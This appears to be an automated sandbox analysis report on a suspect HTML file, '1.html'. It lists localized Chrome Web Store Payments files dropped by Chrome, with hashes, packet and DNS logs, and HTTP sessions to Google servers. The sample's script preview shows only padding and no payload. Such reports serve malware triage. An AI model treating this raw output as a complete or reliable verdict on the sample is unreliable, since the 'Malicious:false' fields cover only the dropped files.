                                                              SHA-512:C85F6281E682F52BC2147DEA7E2F3BB4DC48D98BADA8687B05C6C7271C78EA7F5431CD51671A4184C9AE004FC53C016E3C594697F483195CCBA08A93821EEF70
                                                              Malicious:false
                                                              Preview:{.. "app_description": {.. "message": "Chrome interneta veikala maks.jumu sist.ma".. },.. "app_name": {.. "message": "Chrome interneta veikala maks.jumu sist.ma".. },.. "craw_app_unavailable": {.. "message": "Lietotne pagaid.m nav pieejama.".. },.. "craw_connect_to_network": {.. "message": "L.dzu, izveidojiet savienojumu ar t.klu.".. },.. "iap_unavailable": {.. "message": "Maks.jumi lietotn.s pa.laik nav pieejami.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "L.dzu, pierakstieties p.rl.k. Chrome.".. }..}..
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:UTF-8 Unicode text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):624
                                                              Entropy (8bit):4.555032032637389
                                                              Encrypted:false
                                                              SSDEEP:12:1HEJhiOGGhiO+WYpU34OHSN+dgFjdGFZO8ZpU34JgdN03OyZnLAOfTYiD:1HEDiHIitWYpCYJ8ZpD1OGAOfRD
                                                              MD5:93C459A23BC6953FF744C35920CD2AF9
                                                              SHA1:162F884972103A08ADB616A7EB3598431A2924C5
                                                              SHA-256:2CD700AEB57D89C2E73333D0702556EE3FF3863516170F85669BC680FCBDC4E0
                                                              SHA-512:F76E6E8D8499306883C3EC1E774F7E8BB6B601096DA5A14D17D3E7D5732829542041E42B7350466589291ADCC83FB065FD591B4E20CFCF8EDC586E128ECBFCB5
                                                              Malicious:false
                                                              Preview:{.. "app_description": {.. "message": "Chrome Nettmarked-betalinger".. },.. "app_name": {.. "message": "Chrome Nettmarked-betalinger".. },.. "craw_app_unavailable": {.. "message": "Appen er utilgjengelig for .yeblikket.".. },.. "craw_connect_to_network": {.. "message": "Du m. koble til et nettverk.".. },.. "iap_unavailable": {.. "message": "Betaling i app er ikke tilgjengelig for .yeblikket.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Du m. logge p. Chrome.".. }..}..
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):615
                                                              Entropy (8bit):4.4715318546237315
                                                              Encrypted:false
                                                              SSDEEP:12:1HEJJQGkbGGJQGkb+WYpU34OQKJT+dgiXUmvFZO8ZpU34g7JT03OyZnLAOfTYMD:1HErxkaqxk6WYptndXI8ZpTOGAOfbD
                                                              MD5:7A8F9D0249C680F64DEC7650A432BD57
                                                              SHA1:53477198AEE389F6580921B4876719B400A23CA1
                                                              SHA-256:92BE7C2DC9CFBE5A65E9CE6488D364C8D7EC19E7B67A31E4D43C1CB2B169671C
                                                              SHA-512:969AB979546A741C0F3EDBEEB21BABA375FA8870D4FB9248CDD4C305736E332E10CAB7B64C5C078E60EC0CD73848101B390BE8F44B89C310058AF4C1CA3C8AA7
                                                              Malicious:false
                                                              Preview:{.. "app_description": {.. "message": "Betalingen via Chrome Web Store".. },.. "app_name": {.. "message": "Betalingen via Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "App momenteel niet beschikbaar.".. },.. "craw_connect_to_network": {.. "message": "Maak verbinding met een netwerk.".. },.. "iap_unavailable": {.. "message": "In-app-betalingen is momenteel niet beschikbaar.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Log in bij Chrome.".. }..}..
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:UTF-8 Unicode text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):636
                                                              Entropy (8bit):4.646901997539488
                                                              Encrypted:false
                                                              SSDEEP:12:1HEJbiVbGGbiVb+WYpU34OBHlBi9+dgQUg6O8ZpU34bdbfiIu03OyZnLAOfTYR5k:1HE5iVauiV6WYpIAYr8ZpxFiaOGAOfIC
                                                              MD5:0E6194126AFCCD1E3098D276A7400175
                                                              SHA1:E8127B905A640B1C46362FA6E1127BE172F4A40F
                                                              SHA-256:E2699F98C511B18A2AFB82EAE9A4804B646C4FF1077D80E77C17A3943A6373C2
                                                              SHA-512:A71F7C7BFBBF1E37E699601AF2E095C56CBA91F90CB7556477DF31D01B83ADFB1271E1775C9BA299FF6875BBFC2B6AB47488CC88E33DEF2F6F2E0E5AC687B777
                                                              Malicious:false
                                                              Preview:{.. "app_description": {.. "message": "P.atno.ci w sklepie Chrome Web Store".. },.. "app_name": {.. "message": "P.atno.ci w sklepie Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Aplikacja jest obecnie niedost.pna.".. },.. "craw_connect_to_network": {.. "message": "Po..cz si. z sieci..".. },.. "iap_unavailable": {.. "message": "P.atno.ci w ramach aplikacji s. teraz niedost.pne.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Zaloguj si. w Chrome.".. }..}..
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:UTF-8 Unicode text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):636
                                                              Entropy (8bit):4.515158874306633
                                                              Encrypted:false
                                                              SSDEEP:12:1HEJsc/bGGsc/b+WYpU34OLw+dgn/KzO8ZpU34FjIBMwGRO03OyZnLAOfTYN+KcY:1HEb/a8/6WYp4mZ8Zp7cKlOGAOf2tD
                                                              MD5:86A2B91FA18B867209024C522ED665D5
                                                              SHA1:63DEC245637818C76655E01FCB6D59784BC7184E
                                                              SHA-256:6374880FDD1F8AF1EE8AEA6A06B73BE0AB265AFCEB4FE6F08BDE3B3989264B21
                                                              SHA-512:DA6DBDE5028756421C2904F605632EE98831A25A1247E6238A931629B94CE8A00FD76F4235F118D2167304BD60F2C06B2AD78E54FF6CE53F8C38DF8C7B5AFCE4
                                                              Malicious:false
                                                              Preview:{.. "app_description": {.. "message": "Pagamentos da Chrome Web Store".. },.. "app_name": {.. "message": "Pagamentos da Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Aplicativo indispon.vel no momento.".. },.. "craw_connect_to_network": {.. "message": "Conecte-se a uma rede.".. },.. "iap_unavailable": {.. "message": "No momento, os Pagamentos no aplicativo n.o est.o dispon.veis.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Fa.a login no Google Chrome.".. }..}..
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:UTF-8 Unicode text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):622
                                                              Entropy (8bit):4.526171498622949
                                                              Encrypted:false
                                                              SSDEEP:12:1HEJsZUkbGGsZUkb+WYpU34OAE+dgqxKzO8ZpU34rEpBfvPO03OyZnLAOfTYLD:1HEmUka5Uk6WYpFvdxZ8ZpSTnPlOGAOS
                                                              MD5:750A4800EDB93FBE56495963F9FB3B94
                                                              SHA1:8BFB915488A4EB3CB33D68E2E59F1F8447DB7D61
                                                              SHA-256:C1C94F65FABAF17DEF98A8587711A56D61B1E5607500E9B01F2824DB109F9E83
                                                              SHA-512:2AEDEF5793406221BE76AF22031CE8C30AB5FAEAED09BB394C153E2EBE990C89C1A2A73B40D8A92842641AFCA8C77FFD808A2058602D3646FD8DAE2844406F24
                                                              Malicious:false
                                                              Preview:{.. "app_description": {.. "message": "Pagamentos via Chrome Web Store".. },.. "app_name": {.. "message": "Pagamentos via Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Aplica..o atualmente indispon.vel.".. },.. "craw_connect_to_network": {.. "message": "Ligue-se a uma rede.".. },.. "iap_unavailable": {.. "message": "Os Pagamentos na app est.o atualmente indispon.veis.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Inicie sess.o no Chrome.".. }..}..
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:UTF-8 Unicode text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):641
                                                              Entropy (8bit):4.61125938671415
                                                              Encrypted:false
                                                              SSDEEP:12:1HEJqJrJZGGqJrJZ+WYpU344HIx2Z+dgrVPlZO8ZpU34qT7hI3O03OyZnLAOfTYU:1HEC4D8WYpKow8WV68ZpKhoOGAOfoVGD
                                                              MD5:98D43E4B1054A65DF3FA3CC40AB6FB6D
                                                              SHA1:46E0A21C4DA2BB5D4D8F837AE211C1B6FA26E7E2
                                                              SHA-256:113A13900CBA62FE8AED06751971C23A80A99B47F9BE219CF884D57DB19611D9
                                                              SHA-512:A76DC53912A4F46714926B9EA2B22E909540E447F61F6DD72607AB7B3BB5D4A9B39E525B04C33AEC53BA813D14AC1FB5827275B2524E52B693E83171E1CD1466
                                                              Malicious:false
                                                              Preview:{.. "app_description": {.. "message": "Pl..i prin Magazinul web Chrome".. },.. "app_name": {.. "message": "Pl..i prin Magazinul web Chrome".. },.. "craw_app_unavailable": {.. "message": ".n prezent, aplica.ia nu este disponibil..".. },.. "craw_connect_to_network": {.. "message": "Conecteaz.-te la o re.ea.".. },.. "iap_unavailable": {.. "message": "Pl..ile .n aplica.ie nu sunt disponibile momentan.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Conecteaz.-te la Chrome.".. }..}..
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:UTF-8 Unicode text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):744
                                                              Entropy (8bit):4.918620852166656
                                                              Encrypted:false
                                                              SSDEEP:12:1HEJ7OJHZMSl3ZGG7OJHZMSl3Z+WYpU34zWJ2F+dgVtLSv/TO8ZpU347NWjT03On:1HElOJHZMq4uOJHZMq8WYpdWJ/YGHq8m
                                                              MD5:DB2EDF1465946C06BD95C71A1E13AE64
                                                              SHA1:FB4F3ECE9ECECEBBC6CA2A592A15FB9C1FDFB811
                                                              SHA-256:FBAF22CE6E16DE174CED8CB5EA3098CCA1C3426A2111FF33BD3E64DA64ED67AB
                                                              SHA-512:4E0CF00BAEF1757548DEB17BBE1AF55770A0A0F7351779EF55C7DEFA6D112D0227B8865C2C22E0EC62E6E2F1C8E1632A2D0CE6828D25C5ABBF143C990116F632
                                                              Malicious:false
                                                              Preview:{.. "app_description": {.. "message": "......... ....... ........-........ Chrome".. },.. "app_name": {.. "message": "......... ....... ........-........ Chrome".. },.. "craw_app_unavailable": {.. "message": ".......... ...........".. },.. "craw_connect_to_network": {.. "message": "............ . .....".. },.. "iap_unavailable": {.. "message": "....... ..... .......... ...........".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "....... . Chrome.".. }..}..
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:UTF-8 Unicode text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):647
                                                              Entropy (8bit):4.640777810668463
                                                              Encrypted:false
                                                              SSDEEP:12:1HEJfZGGfZ+WYpU34ORO+dgmmCO8ZpU34yH7u2Z03OyZnLAOfTYCUAi0D:1HEl4G8WYpetPmD8ZpcH7aOGAOfzUeD
                                                              MD5:8DF215D1EFBDABB175CCDD68ED8DCB0A
                                                              SHA1:2B374462137A38589A73FDD00A84CBDC7E50F9F4
                                                              SHA-256:7FA16AF97E6CFC52EC6008EB679D3F30E7E0C24F9EF2D18A9228EAF4DED9D63B
                                                              SHA-512:C0E623343BDAEB4731800D183B59F2FCFE285F0C7153EC99641FD84F2F2DCFE47D21E73F3D28B1240340453C5668EB0AFFBE087AAB62F1C88CD2A40CC44E599D
                                                              Malicious:false
                                                              Preview:{.. "app_description": {.. "message": "Platby Internetov.ho obchodu Chrome".. },.. "app_name": {.. "message": "Platby Internetov.ho obchodu Chrome".. },.. "craw_app_unavailable": {.. "message": "Aplik.cia moment.lne nie je dostupn..".. },.. "craw_connect_to_network": {.. "message": "Pripojte sa k sieti.".. },.. "iap_unavailable": {.. "message": "Platby v aplik.cii moment.lne nie s. k dispoz.cii.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Prihl.ste sa do prehliada.a Chrome.".. }..}..
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:UTF-8 Unicode text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):617
                                                              Entropy (8bit):4.5101656584816885
                                                              Encrypted:false
                                                              SSDEEP:12:1HEJGcyvmbZGGGcyvmbZ+WYpU34OBOEtf+dgca1ZO8ZpU34GcQArERff03OyZnLh:1HE4cyY4TcyY8WYpNoWa1w8ZpQcQ6AfK
                                                              MD5:3943FA2A647AECEDFD685408B27139EE
                                                              SHA1:0129DD19D28373359530B3B477FE8A9279DABB7D
                                                              SHA-256:18AFF072EE0DF7C3495045435C752A805606E6D5D462EF2321C443F1773F4B3A
                                                              SHA-512:42E62B3855611FF2E1D39C11404CB1A09825EE4CA6A8ACB3FF538B4574388F549E3BD79137DD4DC128A8DC44DD270D7D878E4AAD20DA8250A5C25297B0DEC09D
                                                              Malicious:false
                                                              Preview:{.. "app_description": {.. "message": "Pla.ila v spletni trgovini Chrome".. },.. "app_name": {.. "message": "Pla.ila v spletni trgovini Chrome".. },.. "craw_app_unavailable": {.. "message": "Aplikacija trenutno ni na voljo.".. },.. "craw_connect_to_network": {.. "message": "Pove.ite se z omre.jem.".. },.. "iap_unavailable": {.. "message": "Pla.ila v aplikacijah trenutno niso na voljo.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Prijavite se v Chrome.".. }..}..
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:UTF-8 Unicode text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):743
                                                              Entropy (8bit):4.913927107235852
                                                              Encrypted:false
                                                              SSDEEP:12:1HEJssbdOGGssbdO+WYpU347xBP+dgcucO8ZpU34s1muP03OyZnLAOfTYzDYD:1HEKsb59sbTWYplx4Xud8Zpy1mNOGAOv
                                                              MD5:D485DF17F085B6A37125694F85646FD0
                                                              SHA1:24D51D8642CDC6EFD5D8D7A4430232D8CDE25108
                                                              SHA-256:7FFDE34C58E7C376C042DE64DEF6481DAE32BE8B70F0B18EDF536290CBE0C818
                                                              SHA-512:0DDECFD860E99290B6C3AAA04F510272AE081CF2D93ED5832D9D6378EC9D36177FFBE213471247FB94721EA34A83E7665669200047091D0FDE134E3D763217E7
                                                              Malicious:false
                                                              Preview:{.. "app_description": {.. "message": "....... . Chrome ...-..........".. },.. "app_name": {.. "message": "....... . Chrome ...-..........".. },.. "craw_app_unavailable": {.. "message": ".......... .. ........ ...........".. },.. "craw_connect_to_network": {.. "message": "........ .. .......".. },.. "iap_unavailable": {.. "message": "....... . .......... .. ........ ...........".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "......... .. . Chrome.".. }..}..
                                                              File type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                              Entropy (8bit):1.3298565848475958
                                                              TrID:
                                                                File name:1.html
                                                                File size:7195
                                                                MD5:ea483ab89d8b9baf00b953f0636e0520
                                                                SHA1:b0b952334f0d0195b06faed532170263f7fad6c2
                                                                SHA256:5385a798d136365b644199359dc2662de3b0d6c5adc09e4cf9cada074e8a9338
                                                                SHA512:a7a45c96b70280104e4c75ee23ad40cada6e9de8f5c93b41a21b2c9a03beac9d3754bfd41f15ffc78b1117a7656525b83135518179568b0f58f7b8fe80fe4c2f
                                                                SSDEEP:24:0WrXdlR1N7IikLnPKZ2ko7RvctXL34S0VMG:0WrXdZUPyNo7RvwXj4S3G
                                                                TLSH:AAE18C355731A8F004A07674015E9CD34F2A0FCF3A459F63669F48352D8C7B32DA5680
                                                                File Content Preview:<!doctype html>..<html lang="en">..<body>..<script>..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                Icon Hash:e8d6a08c8882c461
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Jun 3, 2022 11:10:17.010709047 CEST49733443192.168.2.4142.251.209.13
                                                                Jun 3, 2022 11:10:17.010751009 CEST44349733142.251.209.13192.168.2.4
                                                                Jun 3, 2022 11:10:17.010823965 CEST49733443192.168.2.4142.251.209.13
                                                                Jun 3, 2022 11:10:17.011291027 CEST49734443192.168.2.4142.250.184.78
                                                                Jun 3, 2022 11:10:17.011322021 CEST44349734142.250.184.78192.168.2.4
                                                                Jun 3, 2022 11:10:17.011385918 CEST49734443192.168.2.4142.250.184.78
                                                                Jun 3, 2022 11:10:17.012346983 CEST49733443192.168.2.4142.251.209.13
                                                                Jun 3, 2022 11:10:17.012372971 CEST44349733142.251.209.13192.168.2.4
                                                                Jun 3, 2022 11:10:17.012608051 CEST49734443192.168.2.4142.250.184.78
                                                                Jun 3, 2022 11:10:17.012624979 CEST44349734142.250.184.78192.168.2.4
                                                                Jun 3, 2022 11:10:17.087598085 CEST44349733142.251.209.13192.168.2.4
                                                                Jun 3, 2022 11:10:17.089025974 CEST44349734142.250.184.78192.168.2.4
                                                                Jun 3, 2022 11:10:17.097816944 CEST49733443192.168.2.4142.251.209.13
                                                                Jun 3, 2022 11:10:17.097842932 CEST44349733142.251.209.13192.168.2.4
                                                                Jun 3, 2022 11:10:17.098061085 CEST49734443192.168.2.4142.250.184.78
                                                                Jun 3, 2022 11:10:17.098079920 CEST44349734142.250.184.78192.168.2.4
                                                                Jun 3, 2022 11:10:17.098824978 CEST44349734142.250.184.78192.168.2.4
                                                                Jun 3, 2022 11:10:17.098905087 CEST49734443192.168.2.4142.250.184.78
                                                                Jun 3, 2022 11:10:17.099268913 CEST44349733142.251.209.13192.168.2.4
                                                                Jun 3, 2022 11:10:17.099344969 CEST49733443192.168.2.4142.251.209.13
                                                                Jun 3, 2022 11:10:17.099680901 CEST44349734142.250.184.78192.168.2.4
                                                                Jun 3, 2022 11:10:17.099746943 CEST49734443192.168.2.4142.250.184.78
                                                                Jun 3, 2022 11:10:17.335728884 CEST49733443192.168.2.4142.251.209.13
                                                                Jun 3, 2022 11:10:17.335937977 CEST49734443192.168.2.4142.250.184.78
                                                                Jun 3, 2022 11:10:17.336119890 CEST44349733142.251.209.13192.168.2.4
                                                                Jun 3, 2022 11:10:17.336374998 CEST49733443192.168.2.4142.251.209.13
                                                                Jun 3, 2022 11:10:17.336422920 CEST44349733142.251.209.13192.168.2.4
                                                                Jun 3, 2022 11:10:17.336496115 CEST49734443192.168.2.4142.250.184.78
                                                                Jun 3, 2022 11:10:17.336503983 CEST44349734142.250.184.78192.168.2.4
                                                                Jun 3, 2022 11:10:17.336750984 CEST44349734142.250.184.78192.168.2.4
                                                                Jun 3, 2022 11:10:17.400316954 CEST44349733142.251.209.13192.168.2.4
                                                                Jun 3, 2022 11:10:17.400404930 CEST49733443192.168.2.4142.251.209.13
                                                                Jun 3, 2022 11:10:17.400446892 CEST44349733142.251.209.13192.168.2.4
                                                                Jun 3, 2022 11:10:17.400516033 CEST44349733142.251.209.13192.168.2.4
                                                                Jun 3, 2022 11:10:17.400597095 CEST49733443192.168.2.4142.251.209.13
                                                                Jun 3, 2022 11:10:17.403640032 CEST49733443192.168.2.4142.251.209.13
                                                                Jun 3, 2022 11:10:17.403676987 CEST44349733142.251.209.13192.168.2.4
                                                                Jun 3, 2022 11:10:17.418183088 CEST44349734142.250.184.78192.168.2.4
                                                                Jun 3, 2022 11:10:17.418329954 CEST49734443192.168.2.4142.250.184.78
                                                                Jun 3, 2022 11:10:17.418349028 CEST44349734142.250.184.78192.168.2.4
                                                                Jun 3, 2022 11:10:17.418381929 CEST44349734142.250.184.78192.168.2.4
                                                                Jun 3, 2022 11:10:17.418457985 CEST49734443192.168.2.4142.250.184.78
                                                                Jun 3, 2022 11:10:17.422967911 CEST49734443192.168.2.4142.250.184.78
                                                                Jun 3, 2022 11:10:17.422987938 CEST44349734142.250.184.78192.168.2.4
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Jun 3, 2022 11:10:16.952723026 CEST6427753192.168.2.48.8.8.8
                                                                Jun 3, 2022 11:10:16.957890034 CEST5607653192.168.2.48.8.8.8
                                                                Jun 3, 2022 11:10:16.980067015 CEST53642778.8.8.8192.168.2.4
                                                                Jun 3, 2022 11:10:16.982903957 CEST53560768.8.8.8192.168.2.4
                                                                Jun 3, 2022 11:10:25.506529093 CEST58172443192.168.2.4142.250.184.78
                                                                Jun 3, 2022 11:10:25.543351889 CEST44358172142.250.184.78192.168.2.4
                                                                Jun 3, 2022 11:10:25.544006109 CEST58172443192.168.2.4142.250.184.78
                                                                Jun 3, 2022 11:10:25.580526114 CEST44358172142.250.184.78192.168.2.4
                                                                Jun 3, 2022 11:10:25.580615044 CEST44358172142.250.184.78192.168.2.4
                                                                Jun 3, 2022 11:10:25.580655098 CEST44358172142.250.184.78192.168.2.4
                                                                Jun 3, 2022 11:10:25.580697060 CEST44358172142.250.184.78192.168.2.4
                                                                Jun 3, 2022 11:10:25.581079006 CEST58172443192.168.2.4142.250.184.78
                                                                Jun 3, 2022 11:10:25.582525969 CEST58172443192.168.2.4142.250.184.78
                                                                Jun 3, 2022 11:10:25.604737043 CEST58172443192.168.2.4142.250.184.78
                                                                Jun 3, 2022 11:10:25.605094910 CEST58172443192.168.2.4142.250.184.78
                                                                Jun 3, 2022 11:10:25.650645018 CEST44358172142.250.184.78192.168.2.4
                                                                Jun 3, 2022 11:10:25.656913996 CEST44358172142.250.184.78192.168.2.4
                                                                Jun 3, 2022 11:10:25.656955957 CEST44358172142.250.184.78192.168.2.4
                                                                Jun 3, 2022 11:10:25.657491922 CEST58172443192.168.2.4142.250.184.78
                                                                Jun 3, 2022 11:10:25.677198887 CEST44358172142.250.184.78192.168.2.4
                                                                Jun 3, 2022 11:10:25.677258015 CEST44358172142.250.184.78192.168.2.4
                                                                Jun 3, 2022 11:10:25.677759886 CEST58172443192.168.2.4142.250.184.78
                                                                Jun 3, 2022 11:10:40.623100996 CEST58172443192.168.2.4142.250.184.78
                                                                Jun 3, 2022 11:10:40.669195890 CEST44358172142.250.184.78192.168.2.4
                                                                Jun 3, 2022 11:13:38.659431934 CEST5702053192.168.2.48.8.8.8
                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                Jun 3, 2022 11:10:16.952723026 CEST192.168.2.48.8.8.80xcca9Standard query (0)clients2.google.comA (IP address)IN (0x0001)
                                                                Jun 3, 2022 11:10:16.957890034 CEST192.168.2.48.8.8.80x3474Standard query (0)accounts.google.comA (IP address)IN (0x0001)
                                                                Jun 3, 2022 11:13:38.659431934 CEST192.168.2.48.8.8.80xd81cStandard query (0)time.windows.comA (IP address)IN (0x0001)
                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                Jun 3, 2022 11:10:16.980067015 CEST8.8.8.8192.168.2.40xcca9No error (0)clients2.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)
                                                                Jun 3, 2022 11:10:16.980067015 CEST8.8.8.8192.168.2.40xcca9No error (0)clients.l.google.com142.250.184.78A (IP address)IN (0x0001)
                                                                Jun 3, 2022 11:10:16.982903957 CEST8.8.8.8192.168.2.40x3474No error (0)accounts.google.com142.251.209.13A (IP address)IN (0x0001)
                                                                Jun 3, 2022 11:13:38.678566933 CEST8.8.8.8192.168.2.40xd81cNo error (0)time.windows.comtwc.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                                                • accounts.google.com
                                                                • clients2.google.com
                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                0192.168.2.449733142.251.209.13443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampkBytes transferredDirectionData
                                                                2022-06-03 09:10:17 UTC0OUTPOST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1
                                                                Host: accounts.google.com
                                                                Connection: keep-alive
                                                                Content-Length: 1
                                                                Origin: https://www.google.com
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: empty
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
                                                                2022-06-03 09:10:17 UTC0OUTData Raw: 20
                                                                Data Ascii:
                                                                2022-06-03 09:10:17 UTC1INHTTP/1.1 200 OK
                                                                Content-Type: application/json; charset=utf-8
                                                                Access-Control-Allow-Origin: https://www.google.com
                                                                Access-Control-Allow-Credentials: true
                                                                X-Content-Type-Options: nosniff
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 03 Jun 2022 09:10:17 GMT
                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/IdentityListAccountsHttp/cspreport
                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-dsjkhxqcRkZvdU0OqotUkA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/IdentityListAccountsHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'nonce-dsjkhxqcRkZvdU0OqotUkA' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/IdentityListAccountsHttp/cspreport
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Server: ESF
                                                                X-XSS-Protection: 0
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                Accept-Ranges: none
                                                                Vary: Accept-Encoding
                                                                Connection: close
                                                                Transfer-Encoding: chunked
                                                                2022-06-03 09:10:17 UTC2INData Raw: 31 31 0d 0a 5b 22 67 61 69 61 2e 6c 2e 61 2e 72 22 2c 5b 5d 5d 0d 0a
                                                                Data Ascii: 11["gaia.l.a.r",[]]
                                                                2022-06-03 09:10:17 UTC2INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                1192.168.2.449734142.250.184.78443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampkBytes transferredDirectionData
                                                                2022-06-03 09:10:17 UTC0OUTGET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=85.0.4183.121&lang=en-GB&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1
                                                                Host: clients2.google.com
                                                                Connection: keep-alive
                                                                X-Goog-Update-Interactivity: fg
                                                                X-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda,pkedcjkdefgpdelpbcmbmeomcjbeemfm
                                                                X-Goog-Update-Updater: chromecrx-85.0.4183.121
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: empty
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
                                                                2022-06-03 09:10:17 UTC2INHTTP/1.1 200 OK
                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-m5MTDc_F5Y95pq1U1tnRJg' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 03 Jun 2022 09:10:17 GMT
                                                                Content-Type: text/xml; charset=UTF-8
                                                                X-Daynum: 5632
                                                                X-Daystart: 7817
                                                                X-Content-Type-Options: nosniff
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-XSS-Protection: 1; mode=block
                                                                Server: GSE
